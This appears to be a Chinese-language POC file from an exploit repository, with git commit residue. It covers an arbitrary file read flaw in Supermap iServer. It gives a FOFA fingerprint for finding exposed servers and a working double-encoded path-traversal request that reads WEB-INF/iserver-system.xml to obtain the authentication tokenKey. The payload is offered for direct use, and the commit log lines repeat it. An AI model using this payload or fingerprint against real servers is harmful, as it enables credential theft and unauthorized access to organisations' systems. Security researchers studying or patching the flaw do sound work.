POC/wpoc/Supermap iServer/Supermap iServer任意文件读取漏洞.md

## Supermap iServer任意文件读取漏洞

## 漏洞描述
北京超图软件股份有限公司是聚焦地理信息软件和空间智能领域的基础软件与应用软件厂商，Supermap iServer 存在文件读取漏洞，攻击者可获取用于认证的tokenKey
## fofa

icon_hash="-1656662001"

## poc
```
/iserver/output/../WEB-IN%2546/iserver-system.xml
```
-												Update Supermap iServer任意文件读取漏洞.md
											
										
										
											2025-05-09 15:28:55 +08:00
+								## Supermap iServer任意文件读取漏洞
-												Create Supermap iServer任意文件读取漏洞.md
											
										
										
											2025-05-09 15:27:32 +08:00
-												Update Supermap iServer任意文件读取漏洞.md
											
										
										
											2025-05-09 15:30:49 +08:00
+								## 漏洞描述
-												Update Supermap iServer任意文件读取漏洞.md
											
										
										
											2025-05-09 15:30:34 +08:00
+								北京超图软件股份有限公司是聚焦地理信息软件和空间智能领域的基础软件与应用软件厂商，Supermap iServer 存在文件读取漏洞，攻击者可获取用于认证的tokenKey
-												Update Supermap iServer任意文件读取漏洞.md
											
										
										
											2025-05-09 15:28:55 +08:00
+								## fofa
 								icon_hash="-1656662001"
 								## poc
 								```
 								/iserver/output/../WEB-IN%2546/iserver-system.xml
 								```